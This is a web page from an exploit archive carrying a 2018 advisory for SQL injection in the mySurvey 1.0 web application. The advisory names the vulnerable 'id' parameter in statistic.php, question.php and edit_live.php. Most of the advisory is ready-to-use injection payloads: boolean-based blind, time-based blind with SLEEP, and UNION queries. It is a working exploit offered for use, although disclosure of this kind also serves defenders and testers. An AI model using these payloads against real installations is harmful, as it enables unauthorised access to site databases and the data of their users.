mySurvey 1.0 SQL Injection

mySurvey 1.0 SQL Injection: Posted May 26, 2018; Authored by Ozkan Mustafa Akkus; mySurvey version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 9e367e231b02557e14dafedec14bbd7d8a17229e1a3d4574a905f967ec9dc0c1; Download | Favorite | View

mySurvey 1.0 SQL Injection

# Exploit Title: mySurvey 1.0 - 'statistic.php' SQL Injection
# Dork: N/A
# Date: 25.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysurvey/6794645
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : You can see the notifications on the left side when you
receive new answers.
This url works in 'statistic.php' with 'id' parameter. This 'id' parameter
is vulnerable.
====================================================
 
# PoC : SQLi :
 
http://test.com/mySurvey/statistic.php?id=[SQLi]
 
Parameter: id (GET)
 
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=31 AND 5291=5291
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=31 AND SLEEP(5)
 
# /question.php Parameter: id (GET)
 
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 2740=2740
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=2 AND SLEEP(5)
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=2 UNION ALL SELECT
NULL,NULL,CONCAT(0x716a787171,0x756d496841646d646a62785a6b7651775a4946456a465142654251536d4b4952646a58564e736166,0x716a627a71),NULL,NULL--
SggH
 
 
# /edit_live.php Parameter: id (GET)
 
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (4199=4199) THEN 4199 ELSE 4199*(SELECT
4199 FROM INFORMATION_SCHEMA.PLUGINS) END))
 
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6620 UNION ALL SELECT
CONCAT(0x716a6b6b71,0x706169774d7955627455656966494d4a78775a6d6e63504f7342426d5266497556767a57636e636e,0x7170786a71),NULL,NULL--
tDPV
 
 
 
# /statistic.php Parameter: id (GET)
 
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=31 AND 5291=5291
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=31 AND SLEEP(5)
 
 
====================================================

Top Authors In Last 30 Days

Red Hat 219 files
Ubuntu 85 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Debian 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

mySurvey 1.0 SQL Injection

mySurvey 1.0 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

mySurvey 1.0 SQL Injection

Share This

mySurvey 1.0 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems